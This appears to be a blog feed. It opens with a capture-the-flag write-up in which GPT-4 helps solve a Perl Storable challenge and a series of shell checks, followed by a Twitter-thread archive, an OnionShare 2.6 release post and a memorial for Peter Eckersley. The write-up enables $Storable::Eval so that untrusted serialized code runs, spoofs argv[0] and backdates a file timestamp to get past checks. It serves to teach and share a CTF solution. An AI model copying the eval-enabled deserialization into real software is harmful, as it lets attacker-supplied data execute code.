<p>Huh, cool. Maybe GPT-4 can write a Perl script for me so I can see what's in that file.</p>
<blockquote><p>Write a Perl script that will display what's in that file</p>
</blockquote>
<p><img src="chatgpt-perckel2.png" alt=""></p>
<p>Nice, I don't have to re-teach myself Perl. I saved the script as <code>script.pl</code> and tried running it:</p>
<pre><code>$ perl script.pl
Can't eval, please set $Storable::Eval to a true value at /System/Library/Perl/5.30/darwin-thread-multi-2level/Storable.pm line 421, at script.pl line 9.
</code></pre>
<p>Hmm, it wants to be able to execute arbitrary code. I'll have to be careful when running this on my computer, but in the meantime let's see if GPT-4 can help fix this issue.</p>
<blockquote><p>Can't eval, please set $Storable::Eval to a true value at /System/Library/Perl/5.30/darwin-thread-multi-2level/Storable.pm line 421, at script.pl line 9.</p>
</blockquote>
<p><img src="chatgpt-perckel3.png" alt=""></p>
<p>Nice, it fixed the script. I updated <code>script.pl</code>, but I didn't want to run it directly on my computer though. (It was nice of GPT-4 to warn me three separate times about the security risks.) So I decided to run it in a Docker container. I created a new Ubuntu container, installed the correct Perl dependencies, and ran it:</p>
<pre><code>root@22b72f43fc3d:/src# perl ./script.pl
Name "Storable::Eval" used only once: possible typo at ./script.pl line 9.
$VAR1 = {
'shqa' => 'iryaeuxfc',
'jwjepylpxecq' => 'yfebe',
--snip--
'iruvqhgdnfstz' => 'smkohnqw',
'qcotpliscszql' => 'efzhu',
'decode_flag' => sub { "DUMMY" },
'htxj' => 'pmifolpyh',
'lftq' => 'pxqqgeqy',
'adbsjrhouqhgg' => 'srndfdboqqmfc',
'avarqfgzrufc' => 'thgzdhdstum',
'pdeqoerfqxbro' => 'grugrmrocnekt',
'ujlw' => 'ooxnyiyu',
'flag' => '��;���@��(�P��@HTX�Т�@��ڂ���@(!k�8�@��Q�
��@�,��}F�@0Z��W�@��R�J�@���JM��@�#*,�@��E~���@�A����@���Y]��@�v���@@�N
b�@���co6�@������@��
�9�D�|�
�@�\'Mi�e�@i��^9�@',
'lquykkphh' => 'bjyrsce',
'ruybrycyo' => 'othebxvqngu',
--snip--
'zxyybaaawc' => 'kbzr',
'pojhbzugch' => 'dqxiybapwepfh'
};
root@22b72f43fc3d:/src#
</code></pre>
<p>The script spewed out over 1,000 lines of output, displaying the value of this Perl object. Most of the keys-value pairs seemed to be garbage, but two of the keys were interesting: <code>flag</code> was a block of binary data, and <code>decode_flag</code> was apparently a Perl function. It sounds like maybe the flag is encoded, and I can call <code>decode_flag</code> to decode it.</p>
<blockquote><p>The $data object has two interesting keys, <code>flag</code> which is binary data, and <code>decode_flag</code> which is a function. Update the script to call the <code>decode_flag</code> function and pass in the value of <code>flag</code></p>
</blockquote>
<p><img src="chatgpt-perckel4.png" alt=""></p>
<p>I updated my script and ran it again:</p>
<pre><code>root@22b72f43fc3d:/src# perl script.pl
Name "Storable::Eval" used only once: possible typo at script.pl line 9.
Decoded flag: CTF{ooohhh_purrrrl_<3}
</code></pre>
<h2 id="shell-hurdles">Shell Hurdles</h2><p><img src="shurdles-challenge.png" alt=""></p>
<p>The challenge provided a link to a web terminal, or a host that I can netcat into to get a shell. Here's what the web terminal looked like:</p>
<p><img src="shurdles-shell1.png" alt=""></p>
<p>Here's the output of a few commands (the hostname is edited for clarity):</p>
<pre><code>ctf@shurdles:~$ ls -l
total 2220
-r-x--x--x 1 root ctf 2270141 Apr 16 2020 shurdles
</code></pre>
<p>My home folder has an executable file called <code>shurdles</code> in it. I tried running it.</p>
<pre><code>ctf@shurdles:~$ ./shurdles
shurdle 0 failed: expected at least 1 argument
</code></pre>
<p>It failed with an error message saying it needs at least 1 argument. This was the first shurdle (shell hurdle), but it's an easy fix--I'll just pass in an argument.</p>
<pre><code>ctf@shurdles:~$ ./shurdles ASDF
shurdle 2 failed: I expected to be called /shurdles, not ./shurdles
</code></pre>
<p>This worked, and I moved onto the next shurdle. This one was pretty hard. This program wants me to run <code>/shurdles</code>, not <code>./shurdles</code>. How can I do that? Let's ask GPT-4. I asked this:</p>
<blockquote><p>I have a bash shell. There is an executable file called /home/ctf/shurdles. I can run it by running:</p>
<p>/home/ctf/shurdles</p>
<p>Or by changing to the folder /home/ctf, and running:</p>
<p>./shurdles</p>
<p>Is it possible for me to run it with this command though, without creating a symlink?</p>
<p>/shurdles</p>
</blockquote>
<p>It responded with a decent idea: add <code>/home/ctf</code> to my PATH so I can just run <code>shurdles</code>, though it wasn't perfect.</p>
<p><img src="chatgpt1.png" alt=""></p>
<p>I tried it anyway, and it didn't work:</p>
<pre><code>ctf@shurdles:~$ export PATH=$PATH:/home/ctf
ctf@shurdles:~$ shurdles ASDF
shurdle 2 failed: I expected to be called /shurdles, not shurdles
</code></pre>
<p>So I went back to GPT-4 and pleaded for additional help.</p>
<blockquote><p>That works to run:</p>
<p>shurdles</p>
<p>But how can I run it with:</p>
<p>/shurdles</p>
</blockquote>
<p>It told me in that case to create a symlink, though that requires root.</p>
<p><img src="chatgpt2.png" alt=""></p>
<p>I don't have root, so I asked for other ideas.</p>
<blockquote><p>Is there any way to do this without using symlinks, and without using root?</p>
</blockquote>
<p>It then came up with a great idea that I might not have thought up on my own: use a shell function.</p>
<p><img src="chatgpt3.png" alt=""></p>
<p>Unfortunately, this didn't work:</p>
<pre><code>ctf@shurdles:~$ function /shurdles() { /home/ctf/shurdles "$@"; }
ctf@shurdles:~$ /shurdles ASDF
shurdle 2 failed: I expected to be called /shurdles, not /home/ctf/shurdles
</code></pre>
<p>It seems that even though I'm running <code>/shurdles</code>, that's a shell function that's running <code>/home/ctf/shurdles</code>, so that's the first argument that the process sees. I asked for more help:</p>
<blockquote><p>That was a great idea, but I actually need the first value of argv to be /shurdles, and that makes the first value /home/ctf/shurdles</p>
</blockquote>
<p>It responded with an idea that I totally wouldn't have thought of, because I had never even heard of <code>exec -a</code>. Fascinating.</p>
<p><img src="chatgpt4.png" alt=""></p>
<p>I decided to give it a try, but I realized the box I was on didn't have vim or nano. So, out of laziness, I just asked for the commands to save <code>shurdles_wrapper.sh</code> using echo instead.</p>
<blockquote><p>How can I create that shurdles_wrapper.sh script using echo, instead of a text editor?</p>
</blockquote>
<p>It gave me the exact command to run.</p>
<p><img src="chatgpt5.png" alt=""></p>
<p>I changed it a bit myself--I stored the script in <code>/tmp/wrapper.sh</code> instead of <code>/home/ctf/shurdles_wrapper.sh</code>, because I didn't have write access to <code>/home/ctf</code>, but it worked:</p>
<pre><code>ctf@shurdles:~$ echo -e '#!/bin/bash\nexec -a /shurdles /home/ctf/shurdles "$@"' > /tmp/wrapper.sh
ctf@shurdles:~$ chmod +x /tmp/wrapper.sh
ctf@shurdles:~$ /tmp/wrapper.sh ASDF
shurdle 3 failed: I expected the environment variable "HACKERS" to look like hack the planet on separate lines
</code></pre>
<p>Got past that shurdle! And onto the next. I could totally figure this one out, but why not save time and get GPT-4 to do it for me?</p>
<blockquote><p>How can I set the environment variable "HACKERS" to be "hack the planet", but with each word on a separate line?</p>
</blockquote>
<p><img src="chatgpt6.png" alt=""></p>
<p>And it worked:</p>
<pre><code>ctf@shurdles:~$ export HACKERS=$'hack\nthe\nplanet'
ctf@shurdles:~$ /tmp/wrapper.sh ASDF
shurdle 5 failed: expected workdir "/run/. -- !!"
</code></pre>
<p>Onto the next shurdle. This one confused me a bit. I asked GPT-4 how I could make my current working directory look like: <code>/run/. -- !!</code>, without actually creating that folder and changing to it. It had some good ideas, including running <code>export PWD='/run/. -- !!'</code> before running the command, but it didn't work. I asked it the different ways a command can learn its working directory, and it told me it can use the <code>PWD</code> environment variable, but also the <code>getcwd</code> function. When I asked how <code>getcwd</code> learned the working directory without the <code>PWD</code> environment variable, it gave me a detailed answer.</p>
<p><img src="chatgpt7.png" alt=""></p>
<p>All of this is nitty gritty Linux details that I didn't know beforehand. And sure, generative language models confidently say things that are false sometimes, so it might not be exactly right... but honestly, it seems about as likely to be right as if I had asked a human Linux nerd. They get things wrong sometimes too.</p>
<p>In the end though, I was barking up the wrong tree. I realized the <code>ctf</code> user had write permission to <code>/run</code>, so I could just create the folder and change to it. So I got past this shurdle on my own.</p>
<pre><code>ctf@shurdles:~$ mkdir '/run/. -- !!'
ctf@shurdles:~$ cd /run/.\ --\ \!\!/
ctf@shurdles:/run/. -- !!$ /tmp/wrapper.sh ASDF
shurdle 6 failed: fd 3 isn't open
</code></pre>
<p>I didn't quite know what this one meant. Did I have to open a file or something? I asked GPT-4.</p>
<blockquote><p>What does "fd 3 isn't open" mean?</p>
</blockquote>
<p><img src="chatgpt8.png" alt=""></p>
<p>Interesting. So the program I'm running needs to open a file, and that will be file descriptor 3... I still had no idea how to make the program open a new file. I tried passing in a valid filename like <code>/home/ctf/.bashrc</code> instead of <code>ASDF</code> as the first argument, but no luck. So I asked GPT-4 for more help:</p>
<blockquote><p>Is there any way I could run the program that's giving this error in a way that will make it open an additional resource, so that file descriptor 3 will be open?</p>
</blockquote>
<p><img src="chatgpt9.png" alt=""></p>
<p>I really ought to learn how to use the <code>exec</code> command... I had no idea about any of this, but I decided to try it.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ exec 3>/tmp/fd3_output.txt
ctf@shurdles:/run/. -- !!$ /tmp/wrapper.sh ASDF
shurdle 6 failed: expected fd 3 to be a file of 1337 bytes in length
</code></pre>
<p>Progress! So I need <code>/tmp/fd3_output.txt</code> to be 1337 bytes long. I knew how to do this, but thought it would be faster to ask GPT-4 than to look up the specific <code>dd</code> arguments, or write Python code, or however I wanted to do it.</p>
<blockquote><p>How can I make /tmp/fd3_output.txt be 1337 bytes long?</p>
</blockquote>
<p><img src="chatgpt10.png" alt=""></p>
<p>When I ran the <code>dd</code> command it made <code>/tmp/fd3_output.txt</code> 1337 bytes long, however when I ran <code>exec 3>/tmp/fd3_output.txt</code> it truncated the file so it was zero bytes. Hmm, how could I solve that?</p>
<blockquote><p>How can I modify the command:</p>
<p>exec 3>/tmp/fd3_output.txt</p>
<p>So that when it creates the file /tmp/fd3_output.txt, it makes it 1337 bytes long?</p>
</blockquote>
<p><img src="chatgpt11.png" alt=""></p>
<p>I tried it... but it didn't work.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ dd if=/dev/zero of=/tmp/fd3_output.txt bs=1 count=1337 && exec 3>/tmp/fd3_output.txt
1337+0 records in
1337+0 records out
1337 bytes (1.3 kB, 1.3 KiB) copied, 0.00219604 s, 609 kB/s
ctf@shurdles:/run/. -- !!$ /tmp/wrapper.sh ASDF
shurdle 6 failed: expected fd 3 to be a file of 1337 bytes in length
</code></pre>
<p>I wonder what's going on.</p>
<blockquote><p>When I run:</p>
<p>dd if=/dev/zero of=/tmp/fd3_output.txt bs=1 count=1337 && exec 3>/tmp/fd3_output.txt</p>
<p>It seems that /tmp/fd3_output.txt is still 0 bytes.</p>
<p>$ ls -l /tmp/fd3_output.txt
-rw-r--r-- 1 ctf ctf 0 Apr 23 06:17 /tmp/fd3_output.txt</p>
</blockquote>
<p><img src="chatgpt12.png" alt=""></p>
<p>Let's see...</p>
<pre><code>ctf@shurdles:/run/. -- !!$ dd if=/dev/zero of=/tmp/fd3_output.txt bs=1 count=1337 && exec 3<>/tmp/fd3_output.txt
1337+0 records in
1337+0 records out
1337 bytes (1.3 kB, 1.3 KiB) copied, 0.0021625 s, 618 kB/s
ctf@shurdles:/run/. -- !!$ /tmp/wrapper.sh ASDF
shurdle 7 failed: tz Local != America/Los_Angeles
</code></pre>
<p>One more shurdle down! Okay, so I need to update the time zone next.</p>
<blockquote><p>How do I set the time zone to "America/Los_Angeles" so that the next command I run recognizes that as the time zone?</p>
</blockquote>
<p><img src="chatgpt13.png" alt=""></p>
<pre><code>ctf@shurdles:/run/. -- !!$ exec 3<>/tmp/fd3_output.txt && TZ="America/Los_Angeles" /tmp/wrapper.sh ASDF
shurdle 8 failed: could not find shurdles-helper
</code></pre>
<p>Another shurdle down! Now it needs to find <code>shurdles-helper</code>. This one I can solve on my own, by creating a new folder, putting an executable file called <code>shurdles-helper</code> into it, and adding it to the PATH.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ mkdir /tmp/bin
ctf@shurdles:/run/. -- !!$ echo -e '#!/bin/bash\necho helper' > /tmp/bin/shurdles-helper
ctf@shurdles:/run/. -- !!$ chmod +x /tmp/bin/shurdles-helper
ctf@shurdles:/run/. -- !!$ export PATH=/tmp/bin:$PATH
ctf@shurdles:/run/. -- !!$ exec 3<>/tmp/fd3_output.txt && TZ="America/Los_Angeles" /tmp/wrapper.sh ASDF
shurdle 9 failed: expected /home/ctf/.cache/shurdles, does it exist?
</code></pre>
<p>It worked. Onto the next shurdle. In this case, it needs a file called <code>/home/ctf/.cache/shurdles</code> to exist. I think I can solve this one on my own too by creating that file.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ mkdir -p /home/ctf/.cache
ctf@shurdles:/run/. -- !!$ touch /home/ctf/.cache/shurdles
ctf@shurdles:/run/. -- !!$ exec 3<>/tmp/fd3_output.txt && TZ="America/Los_Angeles" /tmp/wrapper.sh ASDF
shurdle 9 failed: /home/ctf/.cache/shurdles was modified in the last day, sorry
</code></pre>
<p>It worked too. Now, it needs to timezone to be set to America/Los_Angeles. How you do update the modified timestamp on a file? GPT-4 will know.</p>
<blockquote><p>How you do update the modified timestamp on a file?</p>
</blockquote>
<p><img src="chatgpt14.png" alt=""></p>
<p>Okay, simple enough. I'll set it to a month ago.</p>
<pre><code>ctf@shurdles:/run/. -- !!$ touch -t 202303231430 /home/ctf/.cache/shurdles
ctf@shurdles:/run/. -- !!$ exec 3<>/tmp/fd3_output.txt && TZ="America/Los_Angeles" /tmp/wrapper.sh ASDF
Congratulations!!!
CTF{you_made_it_past_the_hurdles}
</code></pre>
<p>I only made it past the hurdles thanks to you, GPT-4.</p>
Twitter Thread: Response to Matt Taibbi's first Twitter Files Tweets2022-12-02T00:00:00ZMicah Leeurn:uuid:a5d56aa4-cf53-3d46-a458-972575e3fc99<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1598831445048721408">https://twitter.com/micahflee/status/1598831445048721408</a></p>
<hr>
<p>[This Tweet was deleted by the Tweet author.]</p>
<hr>
<p>There aren't archives of all of the tweets available but these are mostly nude photos that were posted without consent</p>
<p><img src="image1.jpg" alt=""></p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">9. Celebrities and unknowns alike could be removed or reviewed at the behest of a political party: <a href="https://t.co/4uzkHnQ65E">pic.twitter.com/4uzkHnQ65E</a></p>— Matt Taibbi (@mtaibbi) <a href="https://twitter.com/mtaibbi/status/1598828601268469760?ref_src=twsrc%5Etfw">December 2, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 4:08 PM · Dec 2, 2022, 128 Retweets, 769 Likes</em></p>
<hr>
<p>Fun fact: Twitter censors links to <a href="https://ddosecrets[.]com">https://ddosecrets[.]com</a> in the same way for publishing police misconduct docs during 2020 BLM protests. The @nypost story was suppressed for 2 DAYS, @DDoSecrets has been censored for OVER 2 YEARS <a href="https://theintercept.com/2022/11/22/elon-musk-twitter-censor-ddosecrets/">https://theintercept.com/2022/11/22/elon-musk-twitter-censor-ddosecrets/</a></p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">18. Twitter took extraordinary steps to suppress the story, removing links and posting warnings that it may be “unsafe.” They even blocked its transmission via direct message, a tool hitherto reserved for extreme cases, e.g. child pornography.</p>— Matt Taibbi (@mtaibbi) <a href="https://twitter.com/mtaibbi/status/1598831435288563712?ref_src=twsrc%5Etfw">December 3, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 4:15 PM · Dec 2, 2022, 370 Retweets, 1,482 Likes</em></p>
<hr>
<p>What's @elonmusk's excuse for banning antifascist accounts last week? Oh yeah, he took requests on who to ban directly from @MrAndyNgo in a twitter thread, and then banned them even though they didn't violate any rules <a href="https://theintercept.com/2022/11/29/elon-musk-twitter-andy-ngo-antifascist/">https://theintercept.com/2022/11/29/elon-musk-twitter-andy-ngo-antifascist/</a></p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">24. “They just freelanced it,” is how one former employee characterized the decision. “Hacking was the excuse, but within a few hours, pretty much everyone realized that wasn’t going to hold. But no one had the guts to reverse it.”</p>— Matt Taibbi (@mtaibbi) <a href="https://twitter.com/mtaibbi/status/1598834373482070016?ref_src=twsrc%5Etfw">December 3, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 4:25 PM · Dec 2, 2022, 286 Retweets, 1,380 Likes</em></p>
<hr>
<p>And just as an aside, OF COURSE twitter shouldn't have censored the link to the @nypost story about Hunter Biden. It was bad, but not nearly as bad as twitter's ongoing censorship of @ddosecrets to this day, which @elonmusk refuses to acknowledge <a href="https://theintercept.com/2022/11/22/elon-musk-twitter-censor-ddosecrets/">https://theintercept.com/2022/11/22/elon-musk-twitter-censor-ddosecrets/</a></p>
<p><em>Posted 4:30 PM · Dec 2, 2022, 100 Retweets, 643 Likes</em></p>
<hr>
<p>I just deleted the first tweet in this thread because it accidentally contained revenge porn. It said:</p>
<p>That first tweet contained nude images of Hunter Biden and a woman without their consent... that should have stayed up?</p>
<p><img src="image2.jpg" alt=""></p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">8. By 2020, requests from connected actors to delete tweets were routine. One executive would write to another: “More to review from the Biden team.” The reply would come back: “Handled.” <a href="https://t.co/mnv0YZI4af">pic.twitter.com/mnv0YZI4af</a></p>— Matt Taibbi (@mtaibbi) <a href="https://twitter.com/mtaibbi/status/1598827602403160064?ref_src=twsrc%5Etfw">December 2, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 4:46 PM · Dec 2, 2022, 108 Retweets, 799 Likes</em></p>
<hr>
<p>I would love it if all of Twitter's internal emails were exposed so that we could see the lengths they took to suppress the 2020 Black Lives Matter protests instead of just the stuff conservatives are cherry-picking</p>
<p><em>Posted 5:21 PM · Dec 2, 2022, 621 Retweets, 3,999 Likes</em></p>
<hr>
<p>Or how Twitter bent over backwards to keep Trump's account online despite many, many instances of hate speech, inciting violence, and otherwise violating Twitter's rules</p>
<p><em>Posted 5:22 PM · Dec 2, 2022, 198 Retweets, 1,995 Likes</em></p>
<hr>
<p>It's so annoying how slowly @mtaibbi is tweeting this thread out. THE TWITTER FILES has no files, just tons of tweets posted 20 minutes apart? Like, why isn't this just an article? Did @elonmusk put you up to this?</p>
<p><em>Posted 5:33 PM · Dec 2, 2022, 63 Retweets, 980 Likes</em></p>
<hr>
<p>Anyway, Twitter sucks. Mastodon is fun and way less toxic, if you can make it past the initial usability hurdle. But it's worth it. I can't wait until this site burns down. I'm mostly posting there now <a href="https://infosec.exchange/@micahflee">https://infosec.exchange/@micahflee</a></p>
<p><em>Posted 5:51 PM · Dec 2, 2022, 23 Retweets, 405 Likes</em></p>
OnionShare 2.6 has a quickstart screen, automatic censorship circumvention, and better packaging2022-10-09T00:00:00ZMicah Leeurn:uuid:c3ad5c39-17c3-38bd-bb4e-b97f9a0c5535<p>I'm excited to announce that the OnionShare team just released version 2.6! You can download it from <a href="https://onionshare.org/">onionshare.org</a>. Here are the main things that are new.</p>
<h1 id="quickstart-screen">Quickstart screen</h1><p>When you opened OnionShare it used to immediately try connecting to Tor, and if the connection failed, or if you canceled it, it would <em>then</em> let you adjust your Tor settings. We've now introduced a "quickstart" screen which lets you choose to change your Tor settings before it tries to connect if you'd like to. (And it also has an awesome rocket ship launching animation.)</p>
<p>This is important when it comes to internet censorship. OnionShare keeps its users anonymous by using Tor. Because Tor is a common way to bypass censorship, networks that block part of the internet also often block Tor. There are even entire countries, like Russia, Iran, and China, that try to block Tor. If you're in one of those countries and you open OnionShare, it's better that your computer doesn't automatically connect to a Tor node IP address, instead giving you a chance to change your Tor settings to bypass censorship, like by using a <a href="https://tb-manual.torproject.org/bridges/">Tor bridge</a>, before you connect.</p>
<h1 id="automatic-censorship-circumvention">Automatic censorship circumvention</h1><p>Bypassing censorship sounds complicated, but with Tor it's actually pretty easy, and this release of OnionShare makes it even simpler. If you try connecting to Tor and it fails because of internet censorship, OnionShare will then let you try to automatically bypass it. You just click a button and OnionShare will automatically figure out the best way to bypass the censorship that you're currently facing, and then connect to Tor. That's it.</p>
<p>Behind the scenes, OnionShare use's Tor Project's new distribution system for bridges called <a href="https://gitlab.torproject.org/tpo/anti-censorship/rdsys">rdsys</a>, or the "censorship API". Using a technique called domain fronting, OnionShare makes a connection to rdsys that's disguised as an innocuous request to a major CDN, the kind that you make thousands of times a day as you use the web, asking for ideal settings. Based on the country that you're connecting from, the rdsys server makes its best guess at what your Tor settings should be to bypass censorship. It might tell you to connect using an obfs4proxy bridge, and provide you with IP addresses for some bridges that aren't block in your country; or it might tell you to connect using <a href="https://snowflake.torproject.org/">Snowflake</a>. Tor keeps its rdsys database updated based on the current state of internet censorship.</p>
<p>Late last year, <a href="https://ooni.org/post/2021-russia-blocks-tor/">Russia started blocking Tor</a>. While we were developing this feature we had a friend in Russia test it for us. They went to a public wifi network and opened an early build of OnionShare. They tried connecting to Tor, which failed because it was blocked, and then tried automatically bypassing it, and it succeeded. This should make bypassing censorship much simpler for OnionShare users.</p>
<h1 id="better-packaging">Better packaging</h1><p>Finally, this release includes a lot of new work going into automating packaging. OnionShare is now available for these platforms:</p>
<ul>
<li>Windows (64-bit)</li>
<li>Windows (32-bit)</li>
<li>macOS (Intel, but it runs on Apple Silicon and some day we'll support it natively)</li>
<li>Linux: <a href="https://flathub.org/apps/details/org.onionshare.OnionShare">Flatpak</a> (x86_64 and arm64)</li>
<li>Linux: <a href="https://snapcraft.io/onionshare">Snapcraft</a> (amd64, arm64, and armhf)</li>
</ul>
<p>I'm particularly excited about the Snapcraft work because this makes it much simpler to install in ARM-based Linux systems, such as <a href="https://micahflee.com/2021/02/onionshare-anonymous-dropbox-raspberry-pi/">Raspberry Pis</a>. All you have to do, after <a href="https://snapcraft.io/docs/installing-snap-on-raspbian">installing Snap</a>, is run: <code>sudo snap install onionshare</code>. Then you can run the command line version of OnionShare with <code>onionshare.cli</code>.</p>
<p>The new Snapcraft packaging also automatically builds and pushes changes to the Snapcraft edge channel. So if you want to try the very latest version of OnionShare, basically the code in the main branch <a href="https://github.com/onionshare/onionshare">on github</a>, you can install that by running: <code>sudo snap install onionshare --edge</code>.</p>
Stories about Peter Eckersley2022-09-04T00:00:00ZMicah Leeurn:uuid:4a928436-905f-3d24-9d47-66e016307c8c<p>My friend Peter Eckersley tragically and unexpectedly died on Friday. I hadn't spent much time with him in the last few years, but I wish that I had because he had such a big impact on my life. Wikipedians have created an <a href="https://en.wikipedia.org/wiki/Peter_Eckersley_%28computer_scientist%29">article about Peter</a>, and Seth Schoen, who worked closely with me and Peter at EFF on the tech team, wrote a <a href="https://community.letsencrypt.org/t/peter-eckersley-may-his-memory-be-a-blessing/183854">memorial for him</a> on the Let's Encrypt forum. I thought I would share a few stories about Peter here.</p>
<p>We worked together at EFF for years, and for most of that time he was my manager. Peter encouraged my to switch career paths from being a web developer, where I wrote lots of PHP code to maintain EFF's Drupal website and instance of CiviCRM, to a staff technologist. As a technologist I took over the <a href="https://www.eff.org/https-everywhere">HTTPS Everywhere</a> project, which Peter initially developed, and I got to do cool things like explain how HTTPS worked to journalists who were suddenly interested because of the Snowden revelations. (I had so many conversations with Peter about HTTPS and encrypting the web. The real problem wasn't something HTTPS Everywhere, which rewrote URLs from HTTP to HTTPS, could solve. The problem was the fact that the certificate authority cartel created an expensive barrier to entry to allow website to have basic security. This is why he cofounded <a href="https://letsencrypt.org/">Let's Encrypt</a>, to remove the ridiculous cost burden and make the web more secure and private. And it worked.)</p>
<p>While working in EFF's office in the Mission district of San Francisco, we would regularly take breaks to get coffee at one of the many incredibly coffee shops that was an easy walk or bike ride away. Peter loved espresso drinks, and I also learned about his excellent policy regarding them: He would always take the time to enjoy his coffee, even if he was in a hurry. The negligible efficiency of getting coffee to go and walking it back to office just isn't worth it compared to spending five minutes to sit down and savor your cappuccino.</p>
<p>Peter taught me what entropy is (in the information theory sense of the term), and really about the field of information theory itself. I knew that password managers measured the strength of passwords in entropy, and that you can increase the entropy of your diceware passphrases by increasing the number of words, but I didn't really get it until he explained it to me. I loved this 2010 blog post he wrote called <a href="https://www.eff.org/deeplinks/2010/01/primer-information-theory-and-privacy">A Primer on Information Theory and Privacy</a> which measured the number of bits of entropy it takes to uniquely identify someone. This was part of Peter's groundbreaking research in web browser fingerprinting, and the <a href="https://coveryourtracks.eff.org/">Panopticlick project</a> (since renamed to Cover Your Tracks).</p>
<p>Peter was an avid road bicyclist. We road bikes all over San Francisco. Once, when we were both in Amsterdam (I think this was just after the outdoor hacker conference <a href="https://en.wikipedia.org/wiki/Observe._Hack._Make.">Observe. Hack. Make.</a> in 2013) he had actually brought his fancy road bike to Europe with him, because he was planning on bike touring around afterwards. I had rented one of those cheap cruisers that are ubiquitous in Amsterdam. I remember we were near Centraal Station, surrounded by hundreds of bicyclists, and Peter was the only one wearing a helmet, which he had brought with him. Should he not wear his helmet, since no one else was? But he decided to wear it anyway regardless of what everyone else was doing. "That's not why I wear a helmet," he said.</p>
<p>After I married my wife Crystal in 2012 (I'm really glad that Peter was able to travel across the country to attend my wedding), we were both in something like $20,000 of credit card debt that seemed impossible to ever pay off. Peter had savings and hated the corrupt finance industry, and so he lent us $20k at an incredibly low interest rate. We immediately paid off all of our credit card debt, and then paid him back. Without Peter it would have taken us years longer to get out of debt. I also had a really low salary at EFF when I first started ($55k, though it was higher pay than I'd ever had before). Peter helped encourage me and prepare me to ask for a raise, the first time I had ever done so--and my salary went up to something like $75k.</p>
<p>Peter never made a Twitter account, but he kind of wanted one. The one thing stopping him was the username: @pde was already taken, and he decided he didn't want to make an account unless he could get the same three-letter username he used everywhere else.</p>
<p>Just as Peter was an espresso connoisseur, he was also a cocktail connoisseur. I'd never actually met anyone who was as knowledgeable about cocktails as Peter before, and he really made me understand why someone would spend $15 on one (I don't drink all that much). Cocktails can be like entrees at a fancy restaurant. I remember I was at a bar with him when he described, in intricate detail, what goes into a Manhattan. "After the whiskey, you add in the vermouth, which actually makes it <em>less</em> alcoholic, since vermouth has 15% alcohol and the whiskey has 40%."</p>
<p>Peter encouraged me to get better at programming in Python. Now it's my favorite language. When I was a teenager I first taught myself C++ and Perl and then quickly moved onto PHP/MySQL. For many years, as a web developer, I only programmed in PHP and JavaScript. When I started at EFF I knew a little Python (if you're proficient in one programming language you know a little of all of the rest) but PHP was still my go-to language. If a bash script I was writing started to get gnarly, I'd rewrite it in PHP. But Peter told me about how wonderful Python is at things like this compared to PHP. And how it was getting more popular and came pre-installed in every single Linux distro. He was right, Python is so much nicer than PHP, and a better tool for scripting. Since then I've programmed quite a lot of software in Python: Tor Browser Launcher, OnionShare, Dangerzone, and Semiphemeral. I'm writing a <a href="https://nostarch.com/hacks-leaks-and-revelations">book</a> right now that, among other things, teaches journalists and researchers to program in Python.</p>
<p>If you work at EFF for long enough you get a 2-month paid sabbatical. Right before Peter took his, a mysterious structure appeared on the roof of EFF's office (this time in the Tenderloin, EFF had moved from the Mission). It was a gazebo that was surprisingly large. We had staff meetings where the executive director was asking everyone wtf was up with it and why it was on the roof (apparently, you need permits from the city to add structures to the roof of your building in San Francisco). It turns out, Peter and some friends from Burning Man had built it there, I think maybe in the middle of the night, just before he left town for his sabbatical, lol.</p>
<p>Once, I was traveling to Tunisia for a post-Arab Spring internet freedom event with Peter. I don't exactly remember the itinerary, but I think we were flying from SFO to Spain, and then on to Tunis, but our flight to Europe showed up hours late and there was only one flight to Tunis from that airport each day. The only way to get there the same night would be to fly to Paris, and then much later in the night transfer to a flight to Tunis. So we went to Paris, and since we had like 6 hours before our flight we left the airport to explore--this is the only time I've ever been to Paris, or to anywhere in France. We visited Notre-Dame, and that bridge that lovers attach locks to, and we ate at a French restaurant. To my surprise, I learned that Peter was entirely fluent in French and could just talk to everyone. This also helped in Tunisia, where people mostly speak Arabic, French, and a little English.</p>
<p>He wasn't just fluent in French. He also <em>triple-majored</em> in college. He had three undergraduate degrees in physics, math, and computer science, and also a PhD in computer science and law--his dissertation was about copyright and piracy. Peter really helped Crystal, my wife, who never finished high school and was just learning early math in community college (now she has a BS in physics and is an applied math grad student), realize that STEM was a possibility for her.</p>
<p>Peter was good friends with Aaron Swartz, and they used to be roommates. After Aaron was indicted for bullshit Computer Fraud and Abuse Act charges, Peter dropped everything to organize an activism campaign at EFF in his defense. I never met Aaron myself, but I rushed to build an activism campaign website to collect signatures to send to Congress. But we never launched it, because Aaron committed suicide first. Peter, and the rest of EFF, then pushed for <a href="https://www.eff.org/deeplinks/2013/06/aarons-law-introduced-now-time-reform-cfaa">Aaron's Law</a>, a bill to reform the CFAA, a goal that EFF <a href="https://www.eff.org/deeplinks/2022/05/dojs-new-cfaa-policy-good-start-does-not-go-far-enough-protect-security">still fights for</a>.</p>
<p>I miss Peter. He was just 43 years old when he died, a huge loss for the internet and the world.</p>
<p>I took the photo of Peter at the top of this blog post on a rooftop in Tunis, Tunisia, in 2012. It's licensed Attribution 4.0 International (CC BY 4.0).</p>
<p>--</p>
<p><strong>Update September 7, 2022</strong>: Last night, at Peter's beautiful memorial in San Francisco, I learned that he actually did create a Twitter account in 2015 with the username <a href="https://twitter.com/pde33">@pde33</a> -- and I was surprised to find that I'm actually following him on Twitter! I must have forgotten. He posted the most interesting things about artificial intelligence.</p>
